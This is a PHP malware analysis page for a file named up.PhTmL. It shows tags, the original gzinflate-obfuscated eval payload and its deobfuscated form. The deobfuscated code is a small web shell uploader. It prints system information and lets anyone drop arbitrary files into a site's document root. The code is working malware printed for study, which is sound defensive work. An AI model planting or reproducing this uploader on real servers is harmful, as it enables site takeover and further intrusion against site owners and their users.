PHP Malware Analysis

Back to list

Filename: up.PhTmL

Tags

Input
  • _POST
  • _FILES
Environment
  • php_uname
Files
  • copy

Deobfuscated code

<?php

eval /* PHPDeobfuscator eval output */ {
    echo "Priv8 Home Root Uploader by LCR999X - Security Cyber Art<br>";
    echo "<b>" . php_uname() . "</b><br>";
    echo "<form method='post' enctype='multipart/form-data'>\n\t  <input type='file' name='idx_file'>\n\t  <input type='submit' name='upload' value='upload'>\n\t  </form>";
    $root = $_SERVER['DOCUMENT_ROOT'];
    $files = $_FILES['idx_file']['name'];
    $dest = $root . '/' . $files;
    if (isset($_POST['upload'])) {
        if (is_writable($root)) {
            if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
                $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
                echo "uploadnya sukses beb :* -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
            } else {
                echo "gagal upload root >:(";
            }
        } else {
            if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
                echo "uploadnya sukses beb :* <b>{$files}</b> di folder ini";
            } else {
                echo "gagal upload >:(";
            }
        }
    }
};


Original code

<?php eval("?>".gzinflate("\x95\x92\xdd\x8a\xdb\x30\x10\x85\xaf\xe3\xa7\x18\x4c\x40\x4e\x69\xec\xdb\x26\x6b\x6b\x5b\xd2\x94\x14\xb6\x4d\x70\xbc\xa5\x10\x82\x91\x62\x39\x11\x6b\x5b\xc2\x96\x77\xd7\x94\x7d\xf7\xea\x67\x43\x52\x5a\x4a\x7b\x29\xe6\x9b\x39\xe7\xcc\x28\xbe\x95\x27\xe9\xb1\xc3\x49\x80\xbf\x69\xf9\xe3\x3b\x58\x89\x9a\x41\x2a\x84\x82\x7b\x59\x09\x52\xb0\x16\xe8\x00\x77\x8b\x74\x36\x9b\x7d\x87\x29\x6c\xd9\xa1\x6f\xb9\x1a\x60\x31\x50\x5d\xfb\xd0\xaa\x98\xb6\xd8\xbf\x79\x1d\x12\x53\xec\x87\x7a\x66\xde\x37\xa4\x66\xc1\x24\xf4\xe3\x88\xe2\x5f\x91\x52\xb4\x35\xd4\x4c\x9d\x44\x91\x20\x29\x3a\x85\x80\x35\x07\x35\x48\x96\xa0\xba\xaf\x14\x97\xa4\x55\x91\xa1\xa6\x05\x51\x04\x61\x6f\x04\x10\xf3\x46\xf6\x0a\x1c\x55\xf2\x8a\x21\x30\x0a\x09\xe2\xc5\x73\x6e\xdf\xbf\x63\x5d\x4f\x6b\xae\xce\x60\x6f\xf3\x20\x78\x24\x55\x7f\x79\xba\x2e\xab\x66\x2c\x8e\x5b\x13\x3d\x81\x71\xbe\x5d\xa6\xdf\x96\xe9\x0e\x7d\x5c\x2f\xee\xbf\x2c\xbf\x66\x79\xba\x5e\x67\x68\xaf\x11\xa3\xd6\x59\xe6\xd3\xe7\xbb\xe5\x76\x77\xb1\xb0\xdf\x21\xa3\x65\xa9\x82\x75\x76\x90\x19\x18\xa2\x08\x85\xae\xef\xc6\xe3\x65\xc0\xbb\x8e\xa9\x60\x9c\x6f\xd6\xdb\x6c\x77\x76\xb2\x9f\x4c\xe0\x87\x37\xb2\xe5\xfc\x49\xef\x98\xd0\x8a\x05\xb6\xdf\x55\x4c\xe9\xfd\x41\xc8\x21\xf8\xa3\xb2\xaa\x65\xee\xd4\xdf\x82\x55\x7f\xed\x1a\x8d\x9f\x18\xd5\x4e\xfc\x93\x52\x72\x1e\x45\x7e\x78\x09\xb7\xca\xb2\x4d\xbe\xd2\x2e\xd0\x3e\xf4\x23\x9d\x5f\xe3\xee\x4a\xce\x54\x33\x10\xe8\xfa\x87\x4e\xe7\xa5\x7a\xc8\xfc\x0d\x4c\x31\xc4\x04\x4e\x2d\x2b\x13\x64\x06\x47\x2e\x16\x02\x45\xda\x23\x53\x09\xca\x69\x45\x9a\x07\xa4\x6f\x8e\xe3\x1e\x5f\x21\x71\xd4\x63\xfb\x19\x22\x82\xad\xd2\x0b\xb0\xaa\x63\xce\xa3\x13\x3d\x92\x23\xa9\xc0\x49\x83\xbd\x04\x9e\x07\x8e\xf5\xae\xf1\xff\x58\x84\x95\x3e\x6f\xe2\xef\xd1\xb4\xe3\xb3\x53\x8a\xa1\xe0\x50\x8a\xca\xfc\x7f\xde\xf0\x7f\xf1\x7b\x6d\xd5\x7b\xf1\x6e\xf1\x4f"));